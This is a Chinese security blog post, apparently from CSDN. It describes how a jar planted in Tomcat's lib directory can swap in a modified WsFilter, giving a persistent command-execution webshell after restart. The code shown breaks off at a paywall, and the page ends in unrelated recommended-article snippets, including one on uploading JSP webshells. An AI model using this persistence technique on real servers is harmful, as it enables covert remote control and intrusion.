从一个被Tomcat拒绝的漏洞到特殊内存马

最新推荐文章于 2023-11-20 15:52:29 发布
原创 最新推荐文章于 2023-11-20 15:52:29 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #深度学习 #安全漏洞 #网络安全

本文介绍了通过Tomcat的解析漏洞,如何构造并利用一个特殊的内存马。作者发现了在Tomcat/lib目录下,通过添加命名有空格或特殊字符的jar包,可以实现恶意WsFilter的加载,从而在服务重启后形成持久化的Webshell。尽管Tomcat官方认为这需要其他漏洞配合触发,但作者展示了在特定情况下,这种利用方式可能绕过常规审计。

介绍

今天研究内存马相关的东西,偶然间发现一处解析BUG

一句话来说就是:Tomcat启动时会加载lib下的依赖jar,如果黑客通过上传漏洞或者反序列化漏洞在这个目录添加一个jar,重启后,某些情况下这个jar会被当成正常库来加载,在一定条件下造成RCE

不一定算得上是漏洞,不过我还是向Tomcat发了邮件尝试
在这里插入图片描述
Tomcat果然拒绝了,原因是需要在其他漏洞的基础上触发
在这里插入图片描述
这个漏洞其实在一些情况下会有巧妙的利用,本文就围绕这个利用点来谈

→点击查看技术资料←

1.2000多本网络安全系列电子书
2.网络安全标准题库资料
3.项目源码
4.网络安全基础入门、Linux、web安全、攻防方面的视频
5.网络安全学习路线图

思路

思路来自于之前写的一篇文章:某知名Java框架内存马挖掘

从中得到一种思路:将恶意代码逻辑隐藏到目标框架必须的Filter中

换句话来说,是否能将恶意代码注入到Tomcat默认存在的Filter中呢

使用c0ny1师傅的检测工具发现,任何情况都会存在WsFilter
在这里插入图片描述
能否构造出一个恶意的WsFilter类注入到依赖库中

构造

在目标Tomcat/lib下找到tomcat-websocket.jar
在这里插入图片描述
找到WsFilter的代码,在doFilter中插入一些代码

我这里是简单的回显执行命令,也可以是一些其他逻辑

package org.apache.tomcat.websocket.server;

import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Handles the initial HTTP connection for WebSocket connections.
 */
public class WsFilter implements Filter {
   
   

    private WsServerContainer sc;


    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
   
   
        sc = (WsServerContainer) filterConfig.getServletContext().getAttribute(
                Constants.SERVER_CONTAINER_SERVLET_CONTEXT_ATTRIBUTE);
    }


    @Override
    public void
最低0.47元/天 解锁文章
TomcatTomcat多个版本存在信息泄漏漏洞
cnskylee的博客
05-20 4631
官方原文对于该漏洞的描述(看着这描述,比较费力,这里就不做翻译了)When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1
tomcat漏洞复现
2301_80185313的博客
01-10 1423
tomcat部分漏洞复现
Apache Tomcat请求走私漏洞 CVE-2022-42252
INSBUG的博客
09-01 7153
Apache Tomcat一个开源的Java Servlet容器和JavaServer Pages(JSP)容器。它是由Apache软件基金会开发和维护的,是一个轻量级、快速、可扩展的Web服务器,用于执行Java Servlet和JavaServer Pages技术。
一文了解Tomcat/8.5.19文件上传漏洞复现
allintao的博客
03-13 6563
这里返回201是成功的呢,说明我们的绕过成功了,然后这里我们要写相应的JSP木在请求正文里,那么不会写的怎么办呢,这里可以像我一样用Godzilla一键生成,这里管理点开有个生成,并将有效载荷选择JavaDynamicPayload,点击生成。这里发现后缀为jsp的格式好像是上传不成功,那么我们可以尝试绕过,这里绕过的方式有很多,可以文件流绕过,可以空格绕过,可以"/"绕过,大家可以自己尝试,这里我用"/"绕过。很明显返回的值为201,说明是可行的,那我们直接上传JSP木可不可以呢?
Tomcat】Apache Tomcat多个大版本存在拒绝服务漏洞
cnskylee的博客
12-13 4874
根据Apache Tomcat官方安全报告,Apache Tomcat的多个版本存在因为内存泄漏而导致的拒绝服务的漏洞(CVE编号:CVE-2021-42340)。 受影响的各个大版本: 8.5.xx版本:8.5.60 到8.5.71(8.5.72 版本修复) 9.0.xx版本:9.0.40 到9.0.53(9.0.54 版本修复) 10.0.xx版本:10.0.0-M10 到10.0.11(10.0.12版本修复) 建议升级到以下对应的最新版本: 8.5.73 、9.0.56...
Java服务安全内存实践资料合集(33份).zip
01-14
一个Tomcat拒绝漏洞特殊内存.pdf 从CVE-2022-22947到Spring WebFlux内存与哥斯拉.pdf 从Spring内存检测到隐形.pdf 利用 PHP-FPM 做内存的方法.pdf 利用Fastjson注入Spring内存.pdf 利用shiro反...
精选资源
tomcat服务器8.0版本 apache-tomcat-8.0.15.zip
03-30
这个版本,8.0.15,是一个稳定版,提供了许多增强的功能和修复了已知的安全漏洞。在本文中,我们将深入探讨Tomcat 8.0的关键特性、安装与配置过程以及如何部署Web应用程序。 首先,Tomcat 8.0引入了Java EE 7的兼容...
JBoss4升级包修复Tomcat DIGEST认证安全漏洞
然而,在Apache Tomcat 5.5早期版本中,DIGEST认证实现存在设计缺陷,攻击者可以通过构造特殊请求绕过认证检查或引发拒绝服务(DoS)。具体而言,CVE-2012-3439指出的问题主要包括:1)未正确验证客户端发送的nonce...
tomcat-embed,原声使用提供一个 http 接口,存在哪些风险? 需要做哪些设计防护
最新发布
12-15
<think>Tomcat-embed 是 Apache Tomcat一个嵌入式版本,它允许将 Tomcat 服务器集成到 Java 应用程序中。当使用 Tomcat-embed 提供 HTTP 接口时,可能面临以下安全风险及相应的防护设计: ### 风险 1. **注入...
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
sinat_32849897的博客
07-02 1507
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评...
Tomcat-8.5.19】文件写入漏洞
m0_63241485的博客
08-25 4694
tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 6286
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
中间件安全Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 7604
链接。
Apache Tomcat 信息泄露漏洞CVE-2023-28708处理
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
07-10 8110
那么Tomcat就会删除之前的War包解压的文件夹,重新解压新的War包。导致信息泄露,相关分析这是由于在请求https的时候可重定向到http连接,这个过程会导致会话劫持风险,造成Cookie或Session不安全传输,攻击者可利用该漏洞可在未授权的情况下泄漏 Cookie 或 Session,最终造成服务器敏感性信息泄露。改变,包括web-inf/class,wen-inf/lib,web-inf/web.xml等文件,若发生更改,则局部进行加载,不清空session ,不释放内存
Apache Tomcat 8.5安装配置教程
fwdwqdwq的博客
08-01 1万+
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。这时候不要关闭控制台界面,打开浏览器,输入http//localhost8080,出现Tomcat的网页,证明安装并配置成功!右击“我的电脑”>>选择“属性”>>单击左侧栏“高级系统设置”>>“高级”>>“环境变量”变量值直接复制,添加在原变量值的末尾。...
[自用]Tomcat安装及使用
11-02 418
1. 前提说明 自用的简单教程,无图 2. 安装及配置 到官网下载zip版本http://tomcat.apache.org/download-80.cgi 下载这个版本的。 64-bit Windows zip (pgp, sha512) 下载完后,解压。我当时是放到这个目录: D:\Tools\apache-tomcat-8.5.72\ 如果不需要全局启动,不需要配置tomcat。 需要配置JAVA_HOME,不然无法启动tomcat。 3. 运行及说明 到D:\Tools\apache-tomcat-
指定SpringBoot内嵌Tomcat的版本,修复(CVE-2021-42340)漏洞
热门推荐
zzhongcy的专栏
11-15 1万+
1、查看当前使用的Tomcat版本号 1.1、Maven Repository中查看 比如我们需要查Spring Boot 2.3.12.RELEASE 的内嵌Tomcat版本, 可以打开链接: https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent/2.3.12.RELEASE 如下图, 红框标记的就是tomcat的版本。 1.2、查看depen...
Tomcat8.5.34.0版本漏洞修复
modaner的博客
08-26 1405
5.替换tomcat相关文件 server.xml web.xml catalina.sh logs。2.停止tomcat服务,备份源tomcat文件夹只tomcat_bak目录。6.重命名apache-tomcat-8.5.79文件夹为tomcat漏洞1:拒绝式服务漏洞 组件远程代码执行漏洞 反序列话代码执行漏洞Tomcat8.5.34.0版本漏洞修复。漏洞2:AJP协议文件读取与包含严重漏洞。4.拷贝文件至/usr/local目录下。7.注释掉配置文件中的AJP协议。3.解压tomcat...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4231
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
基于Tomcat的无文件冰蝎内存实现与注入
首先从标题分析,“Tomcat 冰蝎内存”明确指出目标中间件为 Apache Tomcat,版本为 8.0.18-jre8,这是一个广泛使用的Java Web应用服务器。而“冰蝎”指的是国内知名的WebShell管理工具 Behinder(即描述中的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值